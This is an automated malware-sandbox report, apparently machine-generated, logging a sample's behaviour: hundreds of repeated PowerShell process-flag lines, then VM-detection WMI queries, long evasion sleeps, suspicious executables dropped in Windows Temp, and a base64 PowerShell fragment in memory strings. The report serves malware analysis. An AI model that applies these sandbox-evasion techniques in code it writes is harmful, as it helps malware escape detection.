        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Queries memory information (via WMI often done to detect virtual machines)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
        Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
        Source: C:\Windows\Temp\svczHost.exeMemory allocated: 1ABA8190000 memory reserve | memory write watch
        Source: C:\Windows\Temp\myRdpService.exeMemory allocated: 197DBF20000 memory reserve | memory write watch
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9874Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9854Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9826Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9839
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9656
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9845
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5004Thread sleep count: 9854 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4372Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4372Thread sleep time: -900000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8328Thread sleep count: 9826 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10072Thread sleep count: 9839 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9408Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10212Thread sleep count: 9656 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10212Thread sleep count: 130 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep count: 9845 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\net1.exeLast function: Thread delayed
        Source: C:\Windows\Temp\myRdpService.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Temp\myRdpService.exeFile opened: C:\Windows\Temp\FXSTIFFDebugLogFile.txt
        Source: C:\Windows\Temp\myRdpService.exeFile opened: C:\Windows\Temp\GPlNquydeJZUlDGbzOFUAwPY
        Source: C:\Windows\Temp\myRdpService.exeFile opened: C:\Windows\Temp\EDGEMITMP_D24C8.tmp
        Source: C:\Windows\Temp\myRdpService.exeFile opened: C:\Windows\Temp\FXSAPIDebugLogFile.txt
        Source: C:\Windows\Temp\myRdpService.exeFile opened: C:\Windows\Temp\GPlNquydeJZUlDGbzOFUAwPY\config.cfg
        Source: C:\Windows\Temp\myRdpService.exeFile opened: C:\Windows\Temp\GPlNquydeJZUlDGbzOFUAwPY\NULL
        Source: powershell.exe, 0000000A.00000002.3321499337.000002AE4F1CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
        Source: powershell.exe, 0000000A.00000002.3779190095.000002AE6691F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWZQ%SystemRoot%\system32\mswsock.dllaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIA
        Source: powershell.exe, 00000006.00000002.3006009712.0000028370B7D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FMSFT_NetEventVmNetworkAdatper.cdxml
        Source: powershell.exe, 0000000A.00000002.3321499337.000002AE4F1CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
        Source: powershell.exe, 0000000A.00000002.3709676539.000002AE5EE7C000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4161635712.000001ABAC346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704DBA000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
        Source: powershell.exe, 00000006.00000002.3007655492.0000028370DFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw
        Source: powershell.exe, 00000002.00000002.3145355317.0000013EF22DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: powershell.exe, 00000006.00000002.3006009712.0000028370B7D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMSFT_NetEventVmNetworkAdatper.format.ps1xml
        Source: powershell.exe, 0000000A.00000002.3321499337.000002AE4F1CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
